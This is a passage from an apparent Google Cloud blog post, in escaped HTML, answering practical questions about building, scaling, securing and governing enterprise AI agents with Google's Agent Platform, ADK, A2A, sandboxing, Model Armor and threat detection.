&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;For integrated IDE experiences: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Connect the &lt;/span&gt;&lt;a href="https://developers.google.com/knowledge/mcp" rel="noopener" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt;Developer Knowledge Base&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; via MCP to stream official documentation directly into your teams' workflows.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;#2 Who are we building for? Humans, or other agents? &lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Like #1, this might sound like a straightforward question, but you'll want to decide early on if you're building an AI agent for your employees to talk to directly, or if it's meant to coordinate with other agents behind the scenes. Your design requirements will look completely different depending on who — or what — is interacting with the system, so keeping everything under your team's control starts with knowing exactly who you're building for.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;If your answer is humans (building for employees or customers), focus on user experience. You can host and share these tools in a single place like the &lt;/span&gt;&lt;a href="https://cloud.google.com/gemini-enterprise?e=48754805"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Enterprise app&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, or use the &lt;/span&gt;&lt;a href="https://a2ui.org/" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Agent-to-User Interface&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; (A2UI)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; framework to drop interactive components directly into your custom apps.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;If your answer is agents (and you’re building agents meant to talk to &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;other&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; agents), focus on interoperability. By adopting the open &lt;/span&gt;&lt;a href="https://a2a-protocol.org/latest/" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Agent2Agent&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; (A2A)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; protocol, an open standard for seamless communication and collaboration between AI agents, your agents can use standardized metadata to discover each other, pass context, and securely delegate background work across completely different enterprise frameworks.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;See question #14 for more on user and agent identity.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;#3 Which agent development tool should I use?&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;With so many frameworks available, it’s easy for engineering teams to default to fragmented, homegrown setups. To simplify this, &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/developers-practitioners/io26-news-for-agent-developers-on-google-cloud?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;we look at agent development as a four-rung ladder&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, which allows teams to slide between out-of-the-box configuration and code-first control:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Rung 1: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Agent Studio (low-code): A visual workspace inside Agent Platform for rapid prototyping and business teams. Build an agent with Agent Studio &lt;/span&gt;&lt;a href="http://console.cloud.google.com/agent-platform/studio/multimodal"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Rung 2:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Managed Agents API (Agent-as-a-Service): For technical teams who want to define agent behavior via API and let Google handle the infrastructure inside a secure sandbox. Build a custom agent with Managed Agents API &lt;/span&gt;&lt;a href="https://ai.google.dev/gemini-api/docs/agents" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Rung 3:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Antigravity 2.0: A dedicated workspace for developers leveraging AI for advanced coding tasks and engineering pipelines. Build with Antigravity &lt;/span&gt;&lt;a href="https://codelabs.developers.google.com/getting-started-google-antigravity#0" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Rung 4:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Agent Development Kit (ADK 2.0): An engineering-first, code-first framework for software engineers building highly custom, multi-agent networks from scratch. Build a sample agent with ADK &lt;/span&gt;&lt;a href="https://adk.dev/tutorials/multi-tool-agent/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;#4 Should I start with one agent or many, and how do I specialize them?&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Always advocate for your teams to start with a single, highly specialized agent for initial prototyping. If an agent tries to do everything, a few things might happen: accuracy drops, latency spikes, and debugging becomes a nightmare. To avoid this, write tight instructions and limit the tools it can access.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As your workflows grow more complex – or if you hit model context limits – have your engineers graduate to a &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/developers-practitioners/building-collaborative-ai-a-developers-guide-to-multi-agent-systems-with-adk?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;multi-agent system&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. At its core, a multi-agent system is a collection of individual, autonomous agents that collaborate to achieve a goal. Using a framework like ADK, they can organize agents into a network of sub-agents where a coordinator delegates specific tasks to specialized team members, maintaining clear organizational logic.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;Example: Build a sample multi-agent solution with ADK &lt;/span&gt;&lt;a href="https://adk.dev/tutorials/agent-team/" rel="noopener" target="_blank"&gt;&lt;span style="font-style: italic; text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;The scale phase - connectivity and interoperability&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;#5 How do we connect enterprise data and maintain the right business context?&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Your agents need access to the right data to be truly useful. This is where “&lt;/span&gt;&lt;a href="https://cloud.google.com/transform/the-prompt-unlock-ai-agents-with-enterprise-truth?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;enterprise truth&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;” comes in – it's what we call your enterprise’s specific data, tools, constraints, policies, and processes that the agent needs to be successful.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;While there are several ways to accomplish this, the emerging practice is using open standards like Model Context Protocol (MCP) to connect your agents directly to live databases and business apps. However, simply establishing connectivity isn’t enough. To help your agents work accurately and avoid hallucinations, you must also organize this data with clear business context, metadata, and logic. This structured approach ensures your agents don’t just pull raw information, but actually interpret it correctly to and make better decisions across your organization&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;Example: Build a sample multi-agent solution with &lt;/span&gt;&lt;a href="https://adk.dev/integrations/mcp-toolbox-for-databases/" rel="noopener" target="_blank"&gt;&lt;span style="font-style: italic; text-decoration: underline; vertical-align: baseline;"&gt;ADK and MCP Toolbox&lt;/span&gt;&lt;/a&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt; (Managed Server).&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;#6 How do we connect agents built on completely different frameworks?&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;In a large organization, different teams will naturally build agents using the tools that best fit their specific needs, whether that's LangGraph, a homegrown framework, or something else entirely. However, if these systems can’t communicate, you end up with isolated data and workflow silos. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Establishing a universal communication standard allows agents developed on completely different platforms or frameworks to exchange intents, state, and results without specialized integration work.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For cross-framework connectivity (e.g., connecting a LangGraph-based HR agent to an ADK-based CRM agent ), you can implement the A2A protocol. This allows a &lt;/span&gt;&lt;a href="https://www.youtube.com/watch?v=0J_fz6RlqVg&amp;amp;list=PLIivdWyY5sqKGeYWUYi1lDJPl77xk_kOa" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;microservices-style communication pattern&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; across multiple distinct agents, ensuring they can securely talk to each other.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;Example: Build a sample multi-agent solution with &lt;/span&gt;&lt;a href="https://adk.dev/a2a/quickstart-exposing/" rel="noopener" target="_blank"&gt;&lt;span style="font-style: italic; text-decoration: underline; vertical-align: baseline;"&gt;ADK and A2A&lt;/span&gt;&lt;/a&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;#7 How do we help agents find the specific tools they need? &lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Stuffing an agent's context window with multiple tools and APIs degrades performance, increases latency, and drives up token costs. Just as we use RAG to dynamically fetch data on demand, we must apply the same dynamic retrieval strategy to agent tooling. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By utilizing focused agentic Skills, agents load capabilities only when a task requires them. Instead of parsing a massive library of generic instructions, the agent pulls from a single, task-specific index card—ensuring precise, tightly controlled execution.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;Example: Build a multi-agent orchestration pattern with &lt;/span&gt;&lt;a href="https://adk.dev/skills/" rel="noopener" target="_blank"&gt;&lt;span style="font-style: italic; text-decoration: underline; vertical-align: baseline;"&gt;ADK and Skills&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;#8 How do we deploy our agents so they can easily scale?&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;This is the million-dollar question — or, perhaps more accurately, the "tokens-per-minute" question. The key isn't just about choosing the cheapest option, but about finding the right recipe of tools and services that aligns with your workload patterns.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To scale your agents without racking up massive infrastructure overhead, your teams should deploy agents within a fully managed, serverless execution environment. &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/gemini-enterprise-agent-platform/build/runtime"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Agent Runtime&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; is a set of services that enables developers to deploy, manage, and scale AI agents in production. Agent Runtime handles the infrastructure to scale agents in production so you can focus on creating applications. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;A production-ready runtime must offer elastic auto-scaling to handle sudden usage spikes, containerized flexibility to bundle custom software dependencies, and native support for bidirectional streaming to ensure low-latency, real-time interactions. The architecture must also integrate built-in private networking interfaces to securely connect to internal enterprise data without public internet exposure.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;Example: Build a multi-agent orchestration pattern with &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/gemini-enterprise-agent-platform/build/runtime"&gt;&lt;span style="font-style: italic; text-decoration: underline; vertical-align: baseline;"&gt;Agent Runtime&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;#9 What if our agents lose track of context during long-running tasks?&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;To help your AI agents work more effectively, you can give them both short-term and long-term memory. This means using real-time session state to keep immediate conversations going, and a long-term storage layer to remember user preferences and past interactions — all while keeping your agents safely under your team's control.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Agent Platform handles this across two layers.&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt; In ADK, a &lt;/strong&gt;&lt;strong style="vertical-align: baseline;"&gt;sessionService&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; handles the immediate steps of a multi-stage task, while Agent &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Memory Bank&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; acts as a persistent, long-term storage layer to recall past user preferences and project outcomes over time.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;Example: Build a multi-agent orchestration pattern with &lt;/span&gt;&lt;a href="https://adk.dev/sessions/memory/" rel="noopener" target="_blank"&gt;&lt;span style="font-style: italic; text-decoration: underline; vertical-align: baseline;"&gt;Agent Memory Bank&lt;/span&gt;&lt;/a&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://adk.dev/sessions/session/" rel="noopener" target="_blank"&gt;&lt;span style="font-style: italic; text-decoration: underline; vertical-align: baseline;"&gt;ADK memory&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;The optimize phase — trust and efficiency&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;#10 How do we limit the blast radius for an agent running scripts or using a browser?&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;If your agents need to run Python, execute scripts, or browse the web to gather data, they shouldn’t do it directly on your network. Running these tasks in a temporary, isolated sandbox environment makes it easy to isolate any untrusted code or runtime logic errors, keeping them completely separate from your core enterprise systems.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Plus, using our agent runtime with a built-in sandbox helps protect your primary infrastructure and lets your agents safely execute tool calls under your team's full control.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;Example: Build a multi-agent orchestration pattern with &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/gemini-enterprise-agent-platform/scale/sandbox/code-execution-overview"&gt;&lt;span style="font-style: italic; text-decoration: underline; vertical-align: baseline;"&gt;Agent Sandbox&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;#11 How do I ensure my agent stays on-brand?&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;An agent represents your corporate identity. While defining system prompts with clear constraints is a starting point, relying on prompts alone is insufficient (and risky) for production security. You need a mandatory safety layer that enforces core corporate rules and tone constraints, making sure the agent remains bounded regardless of the model's inherent probabilistic nature.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Guardrails turn an unpredictable LLM into a safe enterprise system by allowing the agent to have the flexibility to make autonomous decisions, while keeping it incapable of violating core safety rules. Because these boundaries are implemented as deterministic constraints outside of the agent’s reasoning, they cannot be bypassed.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Complementing this safety layer, structured workflows drive even greater predictability by breaking complex tasks into deterministic, step-by-step pipelines that use code-level routing, conditional logic, and state management to guide the agent through repeatable paths.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;Example: Build a multi-agent orchestration pattern with&lt;/span&gt;&lt;a href="https://adk.dev/safety/#callbacks-and-plugins-for-security-guardrails" rel="noopener" target="_blank"&gt;&lt;span style="font-style: italic; text-decoration: underline; vertical-align: baseline;"&gt; Guardrails agent&lt;/span&gt;&lt;/a&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;. See also &lt;/span&gt;&lt;a href="https://adk.dev/workflows/" rel="noopener" target="_blank"&gt;&lt;span style="font-style: italic; text-decoration: underline; vertical-align: baseline;"&gt;ADK Workflows&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;#12 How do we trust the result?&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Trust is earned through evidence gathered from rigorous testing and ongoing evaluations across the agent’s entire lifecycle. It’s not an automatic given, but rather a result of your method. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;At scale, evaluation is automated using a mix of metrics, human-in-the-loop oversight, and LLM-as-a-judge patterns. By using a more capable model or a specialized self-evaluation agent to audit the primary agent’s output before it reaches the end-user, you can systematically catch inaccuracies and protect the user experience.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;Example: Build a multi-agent orchestration pattern with &lt;/span&gt;&lt;a href="https://github.com/google/adk-samples/tree/1757c02ae77c5f1e10d1eb3e1b5f4a4ed0d5e337/python/agents/safety-plugins#gemini-as-a-judge-plugin" rel="noopener" target="_blank"&gt;&lt;span style="font-style: italic; text-decoration: underline; vertical-align: baseline;"&gt;LLM-as-a Judge&lt;/span&gt;&lt;/a&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://google.github.io/agents-cli/guide/evaluation/" rel="noopener" target="_blank"&gt;&lt;span style="font-style: italic; text-decoration: underline; vertical-align: baseline;"&gt;Self Evaluation&lt;/span&gt;&lt;/a&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt; agent built in&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;#13 How do I control costs that are going overboard?&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;High-performance reasoning is powerful, but it isn’t cheap. To optimize your spend, try using a tiered approach: employ &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;fast, lightweight models&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; (like Gemini Flash) for high-speed, low-complexity tasks, leverage &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;open source models&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; (like Gemma), and reserve your largest, most expensive reasoning models for final decision-making. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For high-volume production, &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/provisioned-throughput-on-vertex-ai?e=48754805?utm_source%3Dtwitter?utm_source%3Dtwitter?utm_source%3Dlinkedin"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;switch to Provisioned Throughput&lt;/span&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;(PT). Think of it like booking dedicated capacity for your steady, predictable everyday traffic, while unexpected spikes safely overflow into standard pay-as-you-go billing.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You can further protect your budget by trimming context windows with precision RAG, utilizing context caching, setting hard stops on agent iterations, and transitioning predictable parts of the agent workflow into deterministic code where feasible.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;Example: Build with &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/architecture/framework/perspectives/ai-ml/cost-optimization"&gt;&lt;span style="font-style: italic; text-decoration: underline; vertical-align: baseline;"&gt;cost control&lt;/span&gt;&lt;/a&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt; in mind and &lt;/span&gt;&lt;a href="https://cloud.google.com/transform/the-kpis-that-actually-matter-for-production-ai-agents?e=48754805"&gt;&lt;span style="font-style: italic; text-decoration: underline; vertical-align: baseline;"&gt;KPIs&lt;/span&gt;&lt;/a&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt; that matter&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;The govern phase — security and oversight&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;#14 How do I align an agent’s data access to match that of its human user?&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Aligning an agent’s data access starts with establishing a secure &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;agent identity&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, which supports three models: operating directly under a user's identity, using the agent's own independent identity, or acting via delegated authority. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For many employee-facing workflows, leveraging &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;delegated authority &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;is the most secure approach. The agent automatically inherits and respects the existing permissions of the employee interacting with it. This guarantees that the agent cannot access data it isn't explicitly authorized to see, eliminating the need to rebuild complex permission structures from scratch while maintaining a clean audit trail.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;Example: Build with&lt;/span&gt;&lt;a href="https://docs.cloud.google.com/gemini-enterprise-agent-platform/scale/runtime/agent-identity"&gt;&lt;span style="font-style: italic; text-decoration: underline; vertical-align: baseline;"&gt; Agent Identity&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;#15 How do I manage shadow AI and agent sprawl?&lt;br /&gt;&lt;/strong&gt;&lt;a href="https://cloud.google.com/transform/these-4-ai-governance-tips-help-counter-shadow-agents"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Unmonitored agents&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; create severe data fragmentation and compliance risks. To prevent sprawl, you can use a central &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;agent registry&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; — a single, discoverable directory that automatically inventories every active agent, its business owner, its target dataset, and its permitted tools. Moving away from manual tracking spreadsheets gives your teams visibility into internal AI projects, ensuring that redundant agents are consolidated and orphaned endpoints are safely decommissioned.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;Example: Build with &lt;/span&gt;&lt;a href="https://adk.dev/integrations/agent-registry/" rel="noopener" target="_blank"&gt;&lt;span style="font-style: italic; text-decoration: underline; vertical-align: baseline;"&gt;Agent Registry&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;#16 How do I define how users, agents, data, and tools are allowed to interact?&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Scaling enterprise automation safely requires a dual-layered policy architecture. First, apply &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;IAM policies&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; to set clear boundaries so agents only access authorized tools and specific data buckets. Second, implement &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;semantic policies&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; that analyze the natural language intent of a user prompt in real time, validating that the agent's planned response aligns with core business rules and compliance mandates before execution.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;Example: Build with &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/gemini-enterprise-agent-platform/govern/policies/overview"&gt;&lt;span style="font-style: italic; text-decoration: underline; vertical-align: baseline;"&gt;Policies&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;#17 How do I enforce those policies and gain visibility into agent activity?&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Policies are meaningless without runtime enforcement and a clear audit trail. To achieve this, you need to route all agent traffic through an &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;agent gateway &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;— the network entry and exit point for all agentic interactions. This gateway should automatically intercept calls between users, agents, and tools to instantly block policy violations, sanitize content, and prevent prompt injections. For total visibility, this gateway must generate network-layer telemetry for every single interaction, feeding real-time behavioral metrics and execution traces directly into your observability dashboards. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;Example: Build with &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/gemini-enterprise-agent-platform/govern/gateways/agent-gateway-overview"&gt;&lt;span style="font-style: italic; text-decoration: underline; vertical-align: baseline;"&gt;Agent Gateway&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;#18 How do I protect prompts and responses against data leakage, prompt injections, and offensive content?&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;When integrated with Agent Platform, Model Armor intercepts prompts before they reach Gemini models, and intercepts responses before your application receives them.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Based on your configuration, Agent Platform calls the Model Armor service, which inspects or blocks traffic that violates your defined policies — enforcing security measures like prompt injection and jailbreak detection, responsible AI filters, and sensitive data protection. You can configure this integration either by using floor settings for project-level protection or by using templates for per-request protection.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;Example: Build with &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/model-armor/model-armor-vertex-integration"&gt;&lt;span style="font-style: italic; text-decoration: underline; vertical-align: baseline;"&gt;Model Armor&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;#19 How do I know if something has gone wrong with one of my agents?&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;To protect your systems, you need to look for behavioral anomalies by auditing your agent's decision-making loop in real time. Running this continuous behavioral audit alongside threat detection ensures you instantly catch whenever a compromised agent attempts a high-risk, uncharacteristic action.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This is where &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Agent Platform Threat Detection&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; (part of Security Command Center) comes in. If an agent attempts unauthorized database commands or connects to unverified external network addresses, the system flags the event in near-real time for rapid isolation — keeping your automated workforce safely under control.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;Example: Build with &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/security-command-center/docs/agent-platform-threat-detection-overview"&gt;&lt;span style="font-style: italic; text-decoration: underline; vertical-align: baseline;"&gt;Threat Detection&lt;/span&gt;&lt;/a&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/security-command-center/docs/concepts-security-sources#anomaly_detection"&gt;&lt;span style="font-style: italic; text-decoration: underline; vertical-align: baseline;"&gt;Agent Anomaly Detection&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;#20 How can I manage the complete agent lifecycle in one place?&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Nobody wants to click through five different cloud consoles just to push an update or run a test. With Agent Platform, you can simply give your coding agents the specific skills and commands needed to build, scale, govern, and optimize production-ready agents.&lt;/span&gt;&lt;/p&gt;
